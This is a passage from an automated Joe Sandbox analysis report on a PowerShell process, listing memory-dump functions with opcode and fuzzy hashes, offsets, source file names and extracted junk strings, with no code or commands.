Opcode ID: 8bfc74918642d9e1daa36a3c7222112f9557d12b1c81f41d43c2122a678ec03a
Instruction ID: 7f1bf699b726758cf88ba18523e5ec13d502de24179ceda5eec878fab65c0310
Opcode Fuzzy Hash: 8bfc74918642d9e1daa36a3c7222112f9557d12b1c81f41d43c2122a678ec03a
Instruction Fuzzy Hash: D301D1763093915FD7118A7AAC50AB7BFE89F86620B1801ABF484C7392DA75CC00C760

Function 0431D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_431d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d59d48359b9f3f8fbebd7c6bc7141d65133df7d4ae4a4e3157d179cb3265276
Instruction ID: 98a4f3d70e12acc7ff7c5a48fcd0acab9b028a5ffd88b282b5e3b10645ee962f
Opcode Fuzzy Hash: 7d59d48359b9f3f8fbebd7c6bc7141d65133df7d4ae4a4e3157d179cb3265276
Instruction Fuzzy Hash: 64012B31504700DED7248E19DD84B67BF9CEF47320F18C529ED480B256C379B841C6B1

Function 0431D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_431d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab43c1a62a53e3c90016e70d793b50d06c8db14d98c932d9ddf569ec6da5a64b
Instruction ID: 092b396d77fb6cdb48316b2b7996cdb80db70346eb39b350182359a5e85fe46a
Opcode Fuzzy Hash: ab43c1a62a53e3c90016e70d793b50d06c8db14d98c932d9ddf569ec6da5a64b
Instruction Fuzzy Hash: 55015E7140E3C09ED7168B259C94B52BFB4EF43224F1D81DBD9888F2A7C269A849C772

Function 06FE3E19 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699212c373ec0178d101aecae073465c1c04281cef65dd48d47e3c729b26bfe1
Instruction ID: 17705d0aed8af9d487a258f433ab60ed7715f2fceaf6ecd3a9c5fb90364d0de1
Opcode Fuzzy Hash: 699212c373ec0178d101aecae073465c1c04281cef65dd48d47e3c729b26bfe1
Instruction Fuzzy Hash: C1F02233F055618BC332167808265AEAF528BD4B99B0008BADE115F247CB395E0AC7E7

Function 0443C000 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c644c02d171cda6f3f4cd4b4d58aaa6571e16e6fd9facb034759b4614134d413
Instruction ID: bf8cedfe800c282bb0d196a16cc0423f32f2c8dbb5a44996c252ed43c8540be8
Opcode Fuzzy Hash: c644c02d171cda6f3f4cd4b4d58aaa6571e16e6fd9facb034759b4614134d413
Instruction Fuzzy Hash: BCF0BE323082641FD7008ABA9C84DBBBFEDEFC9621B04407AF944C3352DAB1CC0086A0

Function 0431D9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_431d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c8afb7cb20467d59ec8b467d2eda93f3a6bbe4b25f8a3a8409189f9b0d0929
Instruction ID: a27d7b57da6613c1b812e66a62de6bdb09d503ca1fd888b7db7063adaf847d5e
Opcode Fuzzy Hash: 23c8afb7cb20467d59ec8b467d2eda93f3a6bbe4b25f8a3a8409189f9b0d0929
Instruction Fuzzy Hash: E5F0F976200610AF9724CF0AD985C23FBADEFD5770719C55AE84A4B615C771FC41CEA0

Function 04437A22 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e4bad4e51efcd20b0b5592df50b01b625fe5b0663da7f37ca5f7e9dbed06a5
Instruction ID: 4b0248d1fe7a6322524152a17617cf22c677177cfdfd13edb026b3fe66a56daf
Opcode Fuzzy Hash: a3e4bad4e51efcd20b0b5592df50b01b625fe5b0663da7f37ca5f7e9dbed06a5
Instruction Fuzzy Hash: 22F0BE75300218AFDB24ABA9D88496FBBE9EF8C675B10052EE50A83310EF30AD418750

Function 044391B8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcecdb708ad3dff929068b05051595141ed595dc2cc21a0ee33d5a548a316dee
Instruction ID: a4039d9f021009d48d26f390156dc9468c6916886f559a3b6e5d4aeacd966a75
Opcode Fuzzy Hash: fcecdb708ad3dff929068b05051595141ed595dc2cc21a0ee33d5a548a316dee
Instruction Fuzzy Hash: 5BF0F6F6B042814FF319AB74D0187ABBBA2DFC1319F24419BD505476A6CE396806CB90

Function 04437A2F Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567e6ae7687fdf16a2027b8f10bbbc0b137aba7de465b84d5d5fa836aeb58d06
Instruction ID: ad5c07d25963280c51186dfa63f05f09622ae37a01e185b73cc44594a17447e5
Opcode Fuzzy Hash: 567e6ae7687fdf16a2027b8f10bbbc0b137aba7de465b84d5d5fa836aeb58d06
Instruction Fuzzy Hash: 0BF0E2713002186FDB249B69E8809AF7BEDEF8C675B00052EE10AC3710DE30AC418790

Function 04437A30 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fce2ee856e8815412db732f929523a519c608a7e502ee7b0b8b1aac26bee85
Instruction ID: 1c8021b395ced3444a3a1c266c39eb3cbf6a127f1625bdcfc0112169d18dedad
Opcode Fuzzy Hash: 44fce2ee856e8815412db732f929523a519c608a7e502ee7b0b8b1aac26bee85
Instruction Fuzzy Hash: EAF0A7713006185FDB149B69D88496F7BEDEF8C675B00052DE10AD3350DF75BD458750

Function 0431D998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201034611.000000000431D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0431D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_431d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e5eb9c4501e905bb2c2a8ff8913df66a87ed3d8efb96d0e8f13a3655009feb
Instruction ID: 406c724aaa383a047156f208d1c1f12aab7a22ac8d1cebf1a6564a50db98d8cc
Opcode Fuzzy Hash: 22e5eb9c4501e905bb2c2a8ff8913df66a87ed3d8efb96d0e8f13a3655009feb
Instruction Fuzzy Hash: 9EF0F975100A80AFD725CF06CD85D23BBB9EB85760B198589A84A5B762C731FC42CF60

Function 06FE3E04 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79933488eb82d256adc7dd24b1179e9773506c33ac3011543834be4f5c5329c8
Instruction ID: 61976e3f1cb0791df7c131b70d54aa467c3602404044b07d4e776826bb06fdea
Opcode Fuzzy Hash: 79933488eb82d256adc7dd24b1179e9773506c33ac3011543834be4f5c5329c8
Instruction Fuzzy Hash: 3EE02BB7F215258FD6B4411C1C5A1B6BB56D7C4E943104576CD039B305D7308D1AC7E5

Function 0443775F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0a17367f9b164cc980c05045e1deb295f4e3ac20ebec36eac2d97f9a574453
Instruction ID: 99558d1111535fd6ba07bd77c42b8b9a8f68d53f104509734debc9aba910445c
Opcode Fuzzy Hash: 2e0a17367f9b164cc980c05045e1deb295f4e3ac20ebec36eac2d97f9a574453
Instruction Fuzzy Hash: B7F0A0B97001088FDF00DB6CD94099A77EAEFCCA5170481A5D94ACB329EF34EC028B91

Function 044391C8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492dbdb9a9e2c3a0254d4f2fc35591f960cefe3687aa7f841eac85366c84c6ad
Instruction ID: 98a19c0bed7a05cc2c11aabc09e39d84c9990970857c6a689afe3c792f94af26
Opcode Fuzzy Hash: 492dbdb9a9e2c3a0254d4f2fc35591f960cefe3687aa7f841eac85366c84c6ad
Instruction Fuzzy Hash: 1FF027F1A041045BF704AB75D0187DFB7A6DFC5758F20816ADA0557799CE397802C7D0

Function 0443DFB0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9853756e36192f3cc30b75b6e96362673b2c20c2502ca0d23dec35eb8cfcd33
Instruction ID: 8bf5a5c7343e3279ac5d665e10cd35005e4172ca641b430911c2be98844f92bb
Opcode Fuzzy Hash: d9853756e36192f3cc30b75b6e96362673b2c20c2502ca0d23dec35eb8cfcd33
Instruction Fuzzy Hash: 90E0E5757401158F8B109B1DD498C2AB7EAEFCEA2672900AAF54ADB375DA61EC018B90

Function 04439238 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46eae3bb5d0f80ba75cbdf764cc28029151ebbba58458fd8d01ecdd4e16f982
Instruction ID: 93618bee59c51fc6ef1883c53b40e121e5c1fe801cbf11d513f9ef47cb4a1e5a
Opcode Fuzzy Hash: a46eae3bb5d0f80ba75cbdf764cc28029151ebbba58458fd8d01ecdd4e16f982
Instruction Fuzzy Hash: 69F0B4706087818FE7519B78D49879ABFA1EF02310F14059ED599C3291DB382850C740

Function 04438A49 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bf951dd1a0edf6286fa7bd8ef00c634f057e394f280f1ff5c59d9659063028
Instruction ID: 44478288ca7411b35045c6ff8b7c21de41e08b9420e08b87b27e5e7fc23d85d6
Opcode Fuzzy Hash: e3bf951dd1a0edf6286fa7bd8ef00c634f057e394f280f1ff5c59d9659063028
Instruction Fuzzy Hash: B4F0A7317086924BDB0A277498582ED7F62AFC6735F04029BD615872D2CF281A158399

Function 0443B068 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aed054f912870443f1905f9230f087e21d24db123b0cef7b369e4c4eea130dd
Instruction ID: 36f9c2b0b04ecc398e66d5f4a36e36e74fed2b51c079749fab0111ed08fde16e
Opcode Fuzzy Hash: 6aed054f912870443f1905f9230f087e21d24db123b0cef7b369e4c4eea130dd
Instruction Fuzzy Hash: F7E026173182E103EF16913D78102A65F63C7CBA22B1E84BBE080CB393DD61990A4350

Function 04439248 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d67a38885a5d372bc90c0d1eead2ac85ad121b138c2f847439364701fd393d2
Instruction ID: 3f1adfd7f457602fcd2d5a5212d94cfb1e37aa728e56dc16c17cf38869e7e1b7
Opcode Fuzzy Hash: 9d67a38885a5d372bc90c0d1eead2ac85ad121b138c2f847439364701fd393d2
Instruction Fuzzy Hash: 42F06D709007044BE764DFB8D49879ABBE5FB44310F004829D50EC3340DF3968808B90

Function 04438A58 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c92444d0a3f6159af4cbb2f5aa8eb16b12baca252af08639807111927785a90
Instruction ID: 6dfd33797ddbad8f90ade9a72bc7b6ab885f84111a6c269dd701ed6cfeebeb15
Opcode Fuzzy Hash: 8c92444d0a3f6159af4cbb2f5aa8eb16b12baca252af08639807111927785a90
Instruction Fuzzy Hash: 5BE0DF31304A1047DB0827B5E80C2EE7A56ABC4B29F00002ADA0A83340CF382A0183D9

Function 04439629 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e74055a6b63de82778d499423a787671fa5b0ee87b5c11bb0a0db766084531
Instruction ID: b61d29e3f36988bd39d2b83985843dc66b9b624a91add9844bb99d80f997c941
Opcode Fuzzy Hash: 13e74055a6b63de82778d499423a787671fa5b0ee87b5c11bb0a0db766084531
Instruction Fuzzy Hash: 0FD05E96701029572EA474AA5A107BB82CF8BCDC6BF1A013FEB08D7B42DD90ED0147E1

Function 04439630 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf60e89083ef7baffdae6840bc7e4dd4a1d114d01cd074b23227ee07c7dc44c1
Instruction ID: 53615b00c4f1a2d9acee6a9e7b24d73916e9ac41ac5e08f2b7d797d27f469c90
Opcode Fuzzy Hash: bf60e89083ef7baffdae6840bc7e4dd4a1d114d01cd074b23227ee07c7dc44c1
Instruction Fuzzy Hash: 8DD05E92300129172EA474AB581077BD2CF8BCDCAAF09013FEB08C3742ED81EC0143E1

Function 0443DE50 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: ded372dfc0b7ac618c570bc7739e1b179dad3ffb3f9e7d6b9037e825b83879f9
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 5BE08631F0011497CB189599D8504D9F7A6DBCC621F04847BE90AA7340DA3269168691

Function 04438819 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c148a9628025115994e06177ac13f9ba7e06ba3fe6840d7211c71db141faefbc
Instruction ID: 9a68e55b2876077fdad2b1b2276585691e76d929311d88ce13566db70aa55b40
Opcode Fuzzy Hash: c148a9628025115994e06177ac13f9ba7e06ba3fe6840d7211c71db141faefbc
Instruction Fuzzy Hash: 8DE04F31E1508BCAEB09BBB8E8169FDBF30FB01701F400699E543829D1EB241A5ACF80

Function 044388E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcb448c0122d753227fa1d988d287151489872018d71141244c31884ea241a1
Instruction ID: 699a9a0b17f3fb4ef31f04265b1a549f386dd39406c5823120b56f721c8b0355
Opcode Fuzzy Hash: 5fcb448c0122d753227fa1d988d287151489872018d71141244c31884ea241a1
Instruction Fuzzy Hash: 18E04F31B092878FC708EBB8E8964ADFFB0AB46205B044296E95593792D7305855DB85

Function 0443F550 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 88897fdfa2b46ab169774dc410eddfeaa53ec2773beee5194e5e7aad51d4b0be
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 2DD067B0D042099F8B80EFADC94156EFBF4EB48200F6085AB8919E7301F7329A128FD5

Function 04438828 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f005966cfda3b710235f48e4aead457a958ed6aa6ddd462c76b7ecd106481a73
Instruction ID: edab99c737359d944d09ed3d2787f1ebb13ae286ca2b0f07855c4ed98a2b4067
Opcode Fuzzy Hash: f005966cfda3b710235f48e4aead457a958ed6aa6ddd462c76b7ecd106481a73
Instruction Fuzzy Hash: 39D0673190510D8BCF08ABA4E85B4FEBB74FA14702F40456AE90793591EA352A5ACEC1

Function 044388F0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29acbc0c0e6c916e71dcd6bd289f22a81a165021d3225b539418ccbeedbe33cc
Instruction ID: f27d76ece691e50eb169d260745a2965bdb805b2ee1f7338104774ca708a8cdc
Opcode Fuzzy Hash: 29acbc0c0e6c916e71dcd6bd289f22a81a165021d3225b539418ccbeedbe33cc
Instruction Fuzzy Hash: 0BD01234A042098BCB18EF64E8464ADBFB4AB44705F004155D90593350EA305841CBC5

Function 044379FA Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8955ad6e72a04f9e7583e459258af33a8dd7bc4432683953c9c8d7f41fa8f1e8
Instruction ID: aeff0bf874f406e0c09d8c74b45c1d7ec9eb1244fde97182f22b01206cc5ab15
Opcode Fuzzy Hash: 8955ad6e72a04f9e7583e459258af33a8dd7bc4432683953c9c8d7f41fa8f1e8
Instruction Fuzzy Hash: A2C04C341443098FC6156F759545938B32DBE4460A754089AE80A06266AF36E951DE44

Function 04437A07 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5e0650db01396ed362e83ecca71769fde1b0825f1a8ae385cd11d8f5f4c9a6
Instruction ID: 4c3625edc6485c85da1bc34997ea599dc08e6b11057b06baac199d4b6f8e888e
Opcode Fuzzy Hash: ba5e0650db01396ed362e83ecca71769fde1b0825f1a8ae385cd11d8f5f4c9a6
Instruction Fuzzy Hash: 56B0923404430D8FC2186F75A906878772DBE4060578408A9F40A0BBA68E3BE880CA95

Function 04437A08 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b597753f9dca4cd99c86abe9890cf86f7d2fec0a57e1ead637af7c7160f41c7
Instruction ID: 21d8b6a08eef3a44e9942ee3dd451c4007d245d0899c1c502a5ad5c4edd074af
Opcode Fuzzy Hash: 4b597753f9dca4cd99c86abe9890cf86f7d2fec0a57e1ead637af7c7160f41c7
Instruction Fuzzy Hash: EDB0923004430D8FC2086F75A905828732DBE4060578408A8E40A0B3A68E3BE840CA44

Function 04437F71 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af8fc38d1b8914917754b24cbe39bda6276537dfcfdeede8f803ba63ae1dbc8
Instruction ID: 739042a2c3197e89e7d4be4cef98e21f949024b001af59ff94cb4638fc2e4de6
Opcode Fuzzy Hash: 8af8fc38d1b8914917754b24cbe39bda6276537dfcfdeede8f803ba63ae1dbc8
Instruction Fuzzy Hash: FEB0123260811187EF0C8B3055480757332B79D602321D0979003C0000CE3004439D04

Function 04437F7F Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f5caf383d67dca14f64d5d8d0841a43a4c0a2ec1f52f89240fdb9a9b926b2d
Instruction ID: f50b76cae5fadfd396d351e5bb56a95e9301190852b03669e57f9a6bd7c607bd
Opcode Fuzzy Hash: 07f5caf383d67dca14f64d5d8d0841a43a4c0a2ec1f52f89240fdb9a9b926b2d
Instruction Fuzzy Hash: ECA0023EA1811157BF4DDA3556595EA27735BC2202314C4AA9103C0444CD3548429948

Non-executed Functions

Function 08153E98 Relevance: 1.6, Strings: 1, Instructions: 373COMMON

Download Yara Rule

Strings

Xgn^, xrefs: 0815418A

Memory Dump Source

Source File: 00000001.00000002.2244628161.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8150000_powershell.jbxd

Similarity

API ID:
String ID: Xgn^
API String ID: 0-1038256505
Opcode ID: 73112f1705cb11d76182b8ff6b19979af15234517e066f5f567c66df61c45cba
Instruction ID: 46d6bb7a45385d200536a0402a00f4416d489b0ceea27893b62106bb05c8c116
Opcode Fuzzy Hash: 73112f1705cb11d76182b8ff6b19979af15234517e066f5f567c66df61c45cba
Instruction Fuzzy Hash: 04E15EB0700205DFEB18DF29C844BAABBF1FF44705F10856DD816DB2A1EB76E9468B90

Function 06FE1BE0 Relevance: 20.4, Strings: 16, Instructions: 404COMMON

Download Yara Rule

Strings

$c1k, xrefs: 06FE20B4
4'jq, xrefs: 06FE1F95
r>l, xrefs: 06FE1C5D
84<l, xrefs: 06FE1F6C
tPjq, xrefs: 06FE1FEB
84<l, xrefs: 06FE1F76
J?l, xrefs: 06FE20C2
J?l, xrefs: 06FE1FA1
4'jq, xrefs: 06FE1C86
r>l, xrefs: 06FE1C53
J?l, xrefs: 06FE200B
tPjq, xrefs: 06FE1FDF
4'jq, xrefs: 06FE1F89
J?l, xrefs: 06FE20CE
J?l, xrefs: 06FE2017
4'jq, xrefs: 06FE1C92

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $c1k$4'jq$4'jq$4'jq$4'jq$84<l$84<l$tPjq$tPjq$J?l$J?l$J?l$J?l$J?l$r>l$r>l
API String ID: 0-1020440608
Opcode ID: dab4e184ab2c85f442c4468994b0b03215b6392b60dbe80bcba368c56c33ca06
Instruction ID: 60dfe8ca9a03798d8ab08412522c687876d5f78fc07936b64e2b388a063f1d16
Opcode Fuzzy Hash: dab4e184ab2c85f442c4468994b0b03215b6392b60dbe80bcba368c56c33ca06
Instruction Fuzzy Hash: 26D15735F042058FCB64CB6A94106ABBFAAAFC5310B1884BBD915CB295DB35CD46C7E2

Function 06FE2AD8 Relevance: 12.8, Strings: 10, Instructions: 260COMMON

Download Yara Rule

Strings

$jq, xrefs: 06FE2CE0
4'jq, xrefs: 06FE2BDB
#.k, xrefs: 06FE2BA7
tPjq, xrefs: 06FE2D25
$jq, xrefs: 06FE2CEC
4'jq, xrefs: 06FE2BE7
4l, xrefs: 06FE2D9D
tPjq, xrefs: 06FE2D31
$jq, xrefs: 06FE2CBA
4l, xrefs: 06FE2D8F

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$#.k$$jq$$jq$$jq$4l$4l
API String ID: 0-1274348444
Opcode ID: 895e654ec4f7fd671fc545ecb9e83b1d3bbdc89611ef287eea84707c0ce1bd91
Instruction ID: ff7d92605c5e213fbe33f75e3f5fe813b917a2eb3a89c4261d34a4fdeef53529
Opcode Fuzzy Hash: 895e654ec4f7fd671fc545ecb9e83b1d3bbdc89611ef287eea84707c0ce1bd91
Instruction Fuzzy Hash: 05816736F042158FD7648B6DC85067ABFAAEFC5220B1484ABD941CB291EA35CE41C7A2

Function 06FE3678 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

$jq, xrefs: 06FE382A
$jq, xrefs: 06FE37FF
4'jq, xrefs: 06FE372E
4l, xrefs: 06FE386D
4'jq, xrefs: 06FE3722
4l, xrefs: 06FE387B
$jq, xrefs: 06FE3836

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

